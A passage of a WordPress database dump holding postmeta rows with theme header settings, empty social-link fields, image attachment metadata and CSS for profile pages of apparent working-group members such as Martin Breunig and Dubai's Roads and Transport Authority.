(16851,2972,'_dt_fancy_header_overlay_color','#000'),
(16852,2972,'_dt_fancy_header_bg_overlay_opacity','50'),
(16853,2972,'_dt_fancy_header_scroll_effect','default'),
(16854,2972,'_dt_fancy_header_bg_parallax','0.5'),
(16855,2972,'_dt_fancy_header_responsiveness_heading',''),
(16856,2972,'_dt_fancy_header_responsiveness','enabled'),
(16857,2972,'_dt_fancy_header_responsiveness_switch','778px'),
(16858,2972,'_dt_fancy_header_responsive_height','70'),
(16859,2972,'_dt_fancy_header_responsive_font_size','30'),
(16860,2972,'_dt_fancy_header_responsive_title_line_height','38'),
(16861,2972,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(16862,2972,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(16863,2972,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(16864,2972,'_dt_teammate_options_go_to_single','1'),
(16865,2972,'_dt_teammate_options_position',''),
(16866,2972,'_dt_teammate_options_website',''),
(16867,2972,'_dt_teammate_options_mail',''),
(16868,2972,'_dt_teammate_options_facebook',''),
(16869,2972,'_dt_teammate_options_twitter',''),
(16870,2972,'_dt_teammate_options_dribbble',''),
(16871,2972,'_dt_teammate_options_you-tube',''),
(16872,2972,'_dt_teammate_options_rss',''),
(16873,2972,'_dt_teammate_options_delicious',''),
(16874,2972,'_dt_teammate_options_flickr',''),
(16875,2972,'_dt_teammate_options_lastfm',''),
(16876,2972,'_dt_teammate_options_linkedin',''),
(16877,2972,'_dt_teammate_options_vimeo',''),
(16878,2972,'_dt_teammate_options_tumbler',''),
(16879,2972,'_dt_teammate_options_pinterest',''),
(16880,2972,'_dt_teammate_options_devian',''),
(16881,2972,'_dt_teammate_options_skype',''),
(16882,2972,'_dt_teammate_options_github',''),
(16883,2972,'_dt_teammate_options_instagram',''),
(16884,2972,'_dt_teammate_options_stumbleupon',''),
(16885,2972,'_dt_teammate_options_behance',''),
(16886,2972,'_dt_teammate_options_px-500',''),
(16887,2972,'_dt_teammate_options_tripedvisor',''),
(16888,2972,'_dt_teammate_options_vk',''),
(16889,2972,'_dt_teammate_options_foursquare',''),
(16890,2972,'_dt_teammate_options_xing',''),
(16891,2972,'_dt_teammate_options_weibo',''),
(16892,2972,'_dt_teammate_options_odnoklassniki',''),
(16893,2972,'_dt_teammate_options_research-gate',''),
(16894,2972,'_dt_teammate_options_yelp',''),
(16895,2972,'_dt_teammate_options_blogger',''),
(16896,2972,'_dt_teammate_options_soundcloud',''),
(16897,2972,'_dt_teammate_options_viber',''),
(16898,2972,'_dt_teammate_options_whatsapp',''),
(16899,2972,'_dt_teammate_options_reddit',''),
(16900,2972,'_dt_teammate_options_snapchat',''),
(16901,2972,'_dt_teammate_options_telegram',''),
(16902,2972,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(16903,2974,'_edit_lock','1667592506:1'),
(16904,2975,'_wp_attached_file','2022/11/ws182.jpg'),
(16905,2975,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:98;s:6:\"height\";i:130;s:4:\"file\";s:17:\"2022/11/ws182.jpg\";s:8:\"filesize\";i:24331;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(16906,2974,'_thumbnail_id','2975'),
(16907,2974,'_edit_last','1'),
(16908,2974,'_dt_sidebar_position','disabled'),
(16909,2974,'_dt_sidebar_widgetarea_id','sidebar_1'),
(16910,2974,'_dt_sidebar_hide_on_mobile','0'),
(16911,2974,'_dt_footer_show','0'),
(16912,2974,'_dt_footer_widgetarea_id','sidebar_2'),
(16913,2974,'_dt_footer_hide_on_mobile','0'),
(16914,2974,'_dt_header_title','fancy'),
(16915,2974,'_dt_header_background','normal'),
(16916,2974,'_dt_header_background_below_slideshow','disabled'),
(16917,2974,'_dt_header_transparent_bg_color_scheme','light'),
(16918,2974,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(16919,2974,'_dt_header_transparent_top_bar_bg_opacity','25'),
(16920,2974,'_dt_header_transparent_bg_color','#000000'),
(16921,2974,'_dt_header_transparent_bg_opacity','50'),
(16922,2974,'_dt_header_disabled_background','normal'),
(16923,2974,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(16924,2974,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(16925,2974,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(16926,2974,'_dt_header_disabled_transparent_bg_color','#000000'),
(16927,2974,'_dt_header_disabled_transparent_bg_opacity','50'),
(16928,2974,'_dt_page_overrides_top_margin',''),
(16929,2974,'_dt_page_overrides_right_margin',''),
(16930,2974,'_dt_page_overrides_bottom_margin',''),
(16931,2974,'_dt_page_overrides_left_margin',''),
(16932,2974,'_dt_mobile_page_padding_top',''),
(16933,2974,'_dt_mobile_page_padding_right',''),
(16934,2974,'_dt_mobile_page_padding_bottom',''),
(16935,2974,'_dt_mobile_page_padding_left',''),
(16936,2974,'_dt_fancy_header_layout_heading',''),
(16937,2974,'_dt_fancy_header_title_aligment','center'),
(16938,2974,'_dt_fancy_header_height','300'),
(16939,2974,'_dt_fancy_header_padding-top','0px'),
(16940,2974,'_dt_fancy_header_padding-bottom','0px'),
(16941,2974,'_dt_fancy_header_breadcrumbs_heading',''),
(16942,2974,'_dt_fancy_header_breadcrumbs','disabled'),
(16943,2974,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(16944,2974,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(16945,2974,'_dt_fancy_header_title_heading',''),
(16946,2974,'_dt_fancy_header_title_mode','custom'),
(16947,2974,'_dt_fancy_header_title','Martin Breunig Karlsruhe Institute of Technology, GERMANY (WG IV/4)'),
(16948,2974,'_dt_fancy_header_title_font_size','30'),
(16949,2974,'_dt_fancy_header_title_line_height','36'),
(16950,2974,'_dt_fancy_header_text_transform','none'),
(16951,2974,'_dt_fancy_header_title_color_mode','color'),
(16952,2974,'_dt_fancy_header_title_color','#ffffff'),
(16953,2974,'_dt_fancy_header_subtitle_heading',''),
(16954,2974,'_dt_fancy_header_subtitle',''),
(16955,2974,'_dt_fancy_header_subtitle_font_size','18'),
(16956,2974,'_dt_fancy_header_subtitle_line_height','26'),
(16957,2974,'_dt_fancy_header_subtitle_text_transform','none'),
(16958,2974,'_dt_fancy_header_subtitle_color_mode','color'),
(16959,2974,'_dt_fancy_header_subtitle_color','#ffffff'),
(16960,2974,'_dt_fancy_header_bg_heading',''),
(16961,2974,'_dt_fancy_header_bg_color','#222222'),
(16962,2974,'_dt_fancy_header_bg_image_origin','custom'),
(16963,2974,'_dt_fancy_header_bg_image','a:0:{}'),
(16964,2974,'_dt_fancy_header_bg_repeat','no-repeat'),
(16965,2974,'_dt_fancy_header_bg_position_x','center'),
(16966,2974,'_dt_fancy_header_bg_position_y','center'),
(16967,2974,'_dt_fancy_header_bg_fullscreen','1'),
(16968,2974,'_dt_fancy_header_bg_overlay','0'),
(16969,2974,'_dt_fancy_header_overlay_color','#000'),
(16970,2974,'_dt_fancy_header_bg_overlay_opacity','50'),
(16971,2974,'_dt_fancy_header_scroll_effect','default'),
(16972,2974,'_dt_fancy_header_bg_parallax','0.5'),
(16973,2974,'_dt_fancy_header_responsiveness_heading',''),
(16974,2974,'_dt_fancy_header_responsiveness','enabled'),
(16975,2974,'_dt_fancy_header_responsiveness_switch','778px'),
(16976,2974,'_dt_fancy_header_responsive_height','70'),
(16977,2974,'_dt_fancy_header_responsive_font_size','30'),
(16978,2974,'_dt_fancy_header_responsive_title_line_height','38'),
(16979,2974,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(16980,2974,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(16981,2974,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(16982,2974,'_dt_teammate_options_go_to_single','1'),
(16983,2974,'_dt_teammate_options_position',''),
(16984,2974,'_dt_teammate_options_website',''),
(16985,2974,'_dt_teammate_options_mail',''),
(16986,2974,'_dt_teammate_options_facebook',''),
(16987,2974,'_dt_teammate_options_twitter',''),
(16988,2974,'_dt_teammate_options_dribbble',''),
(16989,2974,'_dt_teammate_options_you-tube',''),
(16990,2974,'_dt_teammate_options_rss',''),
(16991,2974,'_dt_teammate_options_delicious',''),
(16992,2974,'_dt_teammate_options_flickr',''),
(16993,2974,'_dt_teammate_options_lastfm',''),
(16994,2974,'_dt_teammate_options_linkedin',''),
(16995,2974,'_dt_teammate_options_vimeo',''),
(16996,2974,'_dt_teammate_options_tumbler',''),
(16997,2974,'_dt_teammate_options_pinterest',''),
(16998,2974,'_dt_teammate_options_devian',''),
(16999,2974,'_dt_teammate_options_skype',''),
(17000,2974,'_dt_teammate_options_github',''),
(17001,2974,'_dt_teammate_options_instagram',''),
(17002,2974,'_dt_teammate_options_stumbleupon',''),
(17003,2974,'_dt_teammate_options_behance',''),
(17004,2974,'_dt_teammate_options_px-500',''),
(17005,2974,'_dt_teammate_options_tripedvisor',''),
(17006,2974,'_dt_teammate_options_vk',''),
(17007,2974,'_dt_teammate_options_foursquare',''),
(17008,2974,'_dt_teammate_options_xing',''),
(17009,2974,'_dt_teammate_options_weibo',''),
(17010,2974,'_dt_teammate_options_odnoklassniki',''),
(17011,2974,'_dt_teammate_options_research-gate',''),
(17012,2974,'_dt_teammate_options_yelp',''),
(17013,2974,'_dt_teammate_options_blogger',''),
(17014,2974,'_dt_teammate_options_soundcloud',''),
(17015,2974,'_dt_teammate_options_viber',''),
(17016,2974,'_dt_teammate_options_whatsapp',''),
(17017,2974,'_dt_teammate_options_reddit',''),
(17018,2974,'_dt_teammate_options_snapchat',''),
(17019,2974,'_dt_teammate_options_telegram',''),
(17020,2974,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(17021,2976,'_edit_lock','1667592657:1'),
(17022,2977,'_wp_attached_file','2022/11/ws183.jpg'),
(17023,2977,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:96;s:6:\"height\";i:123;s:4:\"file\";s:17:\"2022/11/ws183.jpg\";s:8:\"filesize\";i:18867;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17024,2976,'_thumbnail_id','2977'),
(17025,2976,'_edit_last','1'),
(17026,2976,'_dt_sidebar_position','disabled'),
(17027,2976,'_dt_sidebar_widgetarea_id','sidebar_1'),
(17028,2976,'_dt_sidebar_hide_on_mobile','0'),
(17029,2976,'_dt_footer_show','0'),
(17030,2976,'_dt_footer_widgetarea_id','sidebar_2'),
(17031,2976,'_dt_footer_hide_on_mobile','0'),
(17032,2976,'_dt_header_title','fancy'),
(17033,2976,'_dt_header_background','normal'),
(17034,2976,'_dt_header_background_below_slideshow','disabled'),
(17035,2976,'_dt_header_transparent_bg_color_scheme','light'),
(17036,2976,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(17037,2976,'_dt_header_transparent_top_bar_bg_opacity','25'),
(17038,2976,'_dt_header_transparent_bg_color','#000000'),
(17039,2976,'_dt_header_transparent_bg_opacity','50'),
(17040,2976,'_dt_header_disabled_background','normal'),
(17041,2976,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(17042,2976,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(17043,2976,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(17044,2976,'_dt_header_disabled_transparent_bg_color','#000000'),
(17045,2976,'_dt_header_disabled_transparent_bg_opacity','50'),
(17046,2976,'_dt_page_overrides_top_margin',''),
(17047,2976,'_dt_page_overrides_right_margin',''),
(17048,2976,'_dt_page_overrides_bottom_margin',''),
(17049,2976,'_dt_page_overrides_left_margin',''),
(17050,2976,'_dt_mobile_page_padding_top',''),
(17051,2976,'_dt_mobile_page_padding_right',''),
(17052,2976,'_dt_mobile_page_padding_bottom',''),
(17053,2976,'_dt_mobile_page_padding_left',''),
(17054,2976,'_dt_fancy_header_layout_heading',''),
(17055,2976,'_dt_fancy_header_title_aligment','center'),
(17056,2976,'_dt_fancy_header_height','300'),
(17057,2976,'_dt_fancy_header_padding-top','0px'),
(17058,2976,'_dt_fancy_header_padding-bottom','0px'),
(17059,2976,'_dt_fancy_header_breadcrumbs_heading',''),
(17060,2976,'_dt_fancy_header_breadcrumbs','disabled'),
(17061,2976,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(17062,2976,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(17063,2976,'_dt_fancy_header_title_heading',''),
(17064,2976,'_dt_fancy_header_title_mode','custom'),
(17065,2976,'_dt_fancy_header_title',' Roads and Transport Authority, Dubai ,UNITED ARAB EMIRATES (WG IV/4)'),
(17066,2976,'_dt_fancy_header_title_font_size','30'),
(17067,2976,'_dt_fancy_header_title_line_height','36'),
(17068,2976,'_dt_fancy_header_text_transform','none'),
(17069,2976,'_dt_fancy_header_title_color_mode','color'),
(17070,2976,'_dt_fancy_header_title_color','#ffffff'),
(17071,2976,'_dt_fancy_header_subtitle_heading',''),
(17072,2976,'_dt_fancy_header_subtitle',''),
(17073,2976,'_dt_fancy_header_subtitle_font_size','18'),
(17074,2976,'_dt_fancy_header_subtitle_line_height','26'),
(17075,2976,'_dt_fancy_header_subtitle_text_transform','none'),
(17076,2976,'_dt_fancy_header_subtitle_color_mode','color'),
(17077,2976,'_dt_fancy_header_subtitle_color','#ffffff'),
(17078,2976,'_dt_fancy_header_bg_heading',''),
(17079,2976,'_dt_fancy_header_bg_color','#222222'),
(17080,2976,'_dt_fancy_header_bg_image_origin','custom'),
(17081,2976,'_dt_fancy_header_bg_image','a:0:{}'),
(17082,2976,'_dt_fancy_header_bg_repeat','no-repeat'),
(17083,2976,'_dt_fancy_header_bg_position_x','center'),
(17084,2976,'_dt_fancy_header_bg_position_y','center'),
(17085,2976,'_dt_fancy_header_bg_fullscreen','1'),
(17086,2976,'_dt_fancy_header_bg_overlay','0'),
(17087,2976,'_dt_fancy_header_overlay_color','#000'),
(17088,2976,'_dt_fancy_header_bg_overlay_opacity','50'),
(17089,2976,'_dt_fancy_header_scroll_effect','default'),
(17090,2976,'_dt_fancy_header_bg_parallax','0.5'),
(17091,2976,'_dt_fancy_header_responsiveness_heading',''),
(17092,2976,'_dt_fancy_header_responsiveness','enabled'),
(17093,2976,'_dt_fancy_header_responsiveness_switch','778px'),
(17094,2976,'_dt_fancy_header_responsive_height','70'),
(17095,2976,'_dt_fancy_header_responsive_font_size','30'),
(17096,2976,'_dt_fancy_header_responsive_title_line_height','38'),
(17097,2976,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(17098,2976,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(17099,2976,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(17100,2976,'_dt_teammate_options_go_to_single','1'),
(17101,2976,'_dt_teammate_options_position',''),
(17102,2976,'_dt_teammate_options_website',''),
(17103,2976,'_dt_teammate_options_mail',''),
(17104,2976,'_dt_teammate_options_facebook',''),
(17105,2976,'_dt_teammate_options_twitter',''),
(17106,2976,'_dt_teammate_options_dribbble',''),
(17107,2976,'_dt_teammate_options_you-tube',''),
(17108,2976,'_dt_teammate_options_rss',''),
(17109,2976,'_dt_teammate_options_delicious',''),
(17110,2976,'_dt_teammate_options_flickr',''),
(17111,2976,'_dt_teammate_options_lastfm',''),
(17112,2976,'_dt_teammate_options_linkedin',''),
(17113,2976,'_dt_teammate_options_vimeo',''),
(17114,2976,'_dt_teammate_options_tumbler',''),
(17115,2976,'_dt_teammate_options_pinterest',''),
(17116,2976,'_dt_teammate_options_devian',''),
(17117,2976,'_dt_teammate_options_skype',''),
(17118,2976,'_dt_teammate_options_github',''),
(17119,2976,'_dt_teammate_options_instagram',''),
(17120,2976,'_dt_teammate_options_stumbleupon',''),
(17121,2976,'_dt_teammate_options_behance',''),
(17122,2976,'_dt_teammate_options_px-500',''),
(17123,2976,'_dt_teammate_options_tripedvisor',''),
(17124,2976,'_dt_teammate_options_vk',''),
(17125,2976,'_dt_teammate_options_foursquare',''),
(17126,2976,'_dt_teammate_options_xing',''),
(17127,2976,'_dt_teammate_options_weibo',''),
(17128,2976,'_dt_teammate_options_odnoklassniki',''),
(17129,2976,'_dt_teammate_options_research-gate',''),
(17130,2976,'_dt_teammate_options_yelp',''),
(17131,2976,'_dt_teammate_options_blogger',''),
(17132,2976,'_dt_teammate_options_soundcloud',''),
(17133,2976,'_dt_teammate_options_viber',''),
(17134,2976,'_dt_teammate_options_whatsapp',''),
(17135,2976,'_dt_teammate_options_reddit',''),
(17136,2976,'_dt_teammate_options_snapchat',''),
(17137,2976,'_dt_teammate_options_telegram',''),
(17138,2976,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(17139,2978,'_edit_lock','1667592848:1'),
(17140,2979,'_wp_attached_file','2022/11/ws184.jpg'),
(17141,2979,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:98;s:6:\"height\";i:122;s:4:\"file\";s:17:\"2022/11/ws184.jpg\";s:8:\"filesize\";i:23597;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17142,2978,'_thumbnail_id','2979'),
(17143,2978,'_edit_last','1'),
(17144,2978,'_dt_sidebar_position','disabled'),
(17145,2978,'_dt_sidebar_widgetarea_id','sidebar_1'),
(17146,2978,'_dt_sidebar_hide_on_mobile','0'),
(17147,2978,'_dt_footer_show','0'),
(17148,2978,'_dt_footer_widgetarea_id','sidebar_2'),
(17149,2978,'_dt_footer_hide_on_mobile','0'),
(17150,2978,'_dt_header_title','fancy'),
(17151,2978,'_dt_header_background','normal'),
(17152,2978,'_dt_header_background_below_slideshow','disabled'),
(17153,2978,'_dt_header_transparent_bg_color_scheme','light'),
(17154,2978,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(17155,2978,'_dt_header_transparent_top_bar_bg_opacity','25'),
(17156,2978,'_dt_header_transparent_bg_color','#000000'),
(17157,2978,'_dt_header_transparent_bg_opacity','50'),
(17158,2978,'_dt_header_disabled_background','normal'),
(17159,2978,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(17160,2978,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(17161,2978,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(17162,2978,'_dt_header_disabled_transparent_bg_color','#000000'),
(17163,2978,'_dt_header_disabled_transparent_bg_opacity','50'),
(17164,2978,'_dt_page_overrides_top_margin',''),
(17165,2978,'_dt_page_overrides_right_margin',''),
(17166,2978,'_dt_page_overrides_bottom_margin',''),
(17167,2978,'_dt_page_overrides_left_margin',''),
(17168,2978,'_dt_mobile_page_padding_top',''),
(17169,2978,'_dt_mobile_page_padding_right',''),
(17170,2978,'_dt_mobile_page_padding_bottom',''),
(17171,2978,'_dt_mobile_page_padding_left',''),
(17172,2978,'_dt_fancy_header_layout_heading',''),
(17173,2978,'_dt_fancy_header_title_aligment','center'),
(17174,2978,'_dt_fancy_header_height','300'),
(17175,2978,'_dt_fancy_header_padding-top','0px'),
(17176,2978,'_dt_fancy_header_padding-bottom','0px'),
(17177,2978,'_dt_fancy_header_breadcrumbs_heading',''),
(17178,2978,'_dt_fancy_header_breadcrumbs','disabled'),
(17179,2978,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(17180,2978,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(17181,2978,'_dt_fancy_header_title_heading',''),
(17182,2978,'_dt_fancy_header_title_mode','custom'),
(17183,2978,'_dt_fancy_header_title','Paul Vincent Kuper '),
(17184,2978,'_dt_fancy_header_title_font_size','30'),
(17185,2978,'_dt_fancy_header_title_line_height','36'),
(17186,2978,'_dt_fancy_header_text_transform','none'),
(17187,2978,'_dt_fancy_header_title_color_mode','color'),
(17188,2978,'_dt_fancy_header_title_color','#ffffff'),
(17189,2978,'_dt_fancy_header_subtitle_heading',''),
(17190,2978,'_dt_fancy_header_subtitle',''),
(17191,2978,'_dt_fancy_header_subtitle_font_size','18'),
(17192,2978,'_dt_fancy_header_subtitle_line_height','26'),
(17193,2978,'_dt_fancy_header_subtitle_text_transform','none'),
(17194,2978,'_dt_fancy_header_subtitle_color_mode','color'),
(17195,2978,'_dt_fancy_header_subtitle_color','#ffffff'),
(17196,2978,'_dt_fancy_header_bg_heading',''),
(17197,2978,'_dt_fancy_header_bg_color','#222222'),
(17198,2978,'_dt_fancy_header_bg_image_origin','custom'),
(17199,2978,'_dt_fancy_header_bg_image','a:0:{}'),
(17200,2978,'_dt_fancy_header_bg_repeat','no-repeat'),
(17201,2978,'_dt_fancy_header_bg_position_x','center'),
(17202,2978,'_dt_fancy_header_bg_position_y','center'),
(17203,2978,'_dt_fancy_header_bg_fullscreen','1'),
(17204,2978,'_dt_fancy_header_bg_overlay','0'),
(17205,2978,'_dt_fancy_header_overlay_color','#000'),
(17206,2978,'_dt_fancy_header_bg_overlay_opacity','50'),
(17207,2978,'_dt_fancy_header_scroll_effect','default'),
(17208,2978,'_dt_fancy_header_bg_parallax','0.5'),
(17209,2978,'_dt_fancy_header_responsiveness_heading',''),
(17210,2978,'_dt_fancy_header_responsiveness','enabled'),
(17211,2978,'_dt_fancy_header_responsiveness_switch','778px'),
(17212,2978,'_dt_fancy_header_responsive_height','70'),
(17213,2978,'_dt_fancy_header_responsive_font_size','30'),
(17214,2978,'_dt_fancy_header_responsive_title_line_height','38'),
(17215,2978,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(17216,2978,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(17217,2978,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(17218,2978,'_dt_teammate_options_go_to_single','1'),
(17219,2978,'_dt_teammate_options_position',''),
(17220,2978,'_dt_teammate_options_website',''),
(17221,2978,'_dt_teammate_options_mail',''),
(17222,2978,'_dt_teammate_options_facebook',''),
(17223,2978,'_dt_teammate_options_twitter',''),
(17224,2978,'_dt_teammate_options_dribbble',''),
(17225,2978,'_dt_teammate_options_you-tube',''),
(17226,2978,'_dt_teammate_options_rss',''),
(17227,2978,'_dt_teammate_options_delicious',''),
(17228,2978,'_dt_teammate_options_flickr',''),
(17229,2978,'_dt_teammate_options_lastfm',''),
(17230,2978,'_dt_teammate_options_linkedin',''),
(17231,2978,'_dt_teammate_options_vimeo',''),
(17232,2978,'_dt_teammate_options_tumbler',''),
(17233,2978,'_dt_teammate_options_pinterest',''),
(17234,2978,'_dt_teammate_options_devian',''),
(17235,2978,'_dt_teammate_options_skype',''),
(17236,2978,'_dt_teammate_options_github',''),
(17237,2978,'_dt_teammate_options_instagram',''),
(17238,2978,'_dt_teammate_options_stumbleupon',''),
(17239,2978,'_dt_teammate_options_behance',''),
(17240,2978,'_dt_teammate_options_px-500',''),
